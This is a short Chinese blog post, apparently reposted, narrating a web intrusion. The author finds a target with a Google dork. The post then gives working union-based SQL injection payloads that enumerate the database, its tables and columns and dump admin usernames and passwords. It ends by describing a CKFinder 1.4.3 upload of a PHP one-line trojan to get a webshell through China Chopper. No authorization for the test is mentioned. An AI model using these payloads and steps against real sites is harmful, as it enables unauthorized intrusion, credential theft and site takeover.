您的位置:首页 > 其它

记一次简单的web渗透测试

2018-04-03 17:20 190 查看
0x01初期探索
        用google语法 inurl:php?id=查找有漏洞的页面



0x20开始寻找注入漏洞
        1.通过简单的sql语句探测(',and 1=1,and 1=2)得出该sql注入为字符型注入(sql语句为:' and '1'='2)
      


        2.构造错误的sql语句,使其爆出数据库类型

       


        3.检测字段数(sql语句:'order by 5--+;猜字段数可用二分法),最后查出字段数为5



        4.构造错误(可构造不存在的id或and 1=2),使页面爆出可利用的字段数(sql语句:'union select 1,2,3,4,5--+)



        4.利用爆出的字段数,构造sql语句查询自己想要的内容

            a.查数据库版本version()

            


            b.构造语句查数据库名(sql语句:'union select 1,2,database(),4,5--+)
            


        c.因mysql版本大于5.0,含有information表,所以可构造语句查表名(sql语句:'union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=数据库名(16进制,可用小葵转换))



    
      d.爆列名(login表,sql语句:'union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=表名(16进制))



        e.爆数据(uname,paswd;sql语句:'union select 1,2,group_concat(uname,0x5c,paswd),4,5 from login--+)

        


0x03提权
    至此,管理员账号和密码已爆出,在用御剑扫后台时发现了其中一个页面



发现网站编辑器为CKFinder,版本1.4.3,可搜索该版本的上传漏洞,上传php一句话木马图片,菜刀连之拿webshell



0x04 小记
刚开始写博客,有些不足希望你们指出,也欢迎各位与我交流共同进步。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  渗透 信息安全 web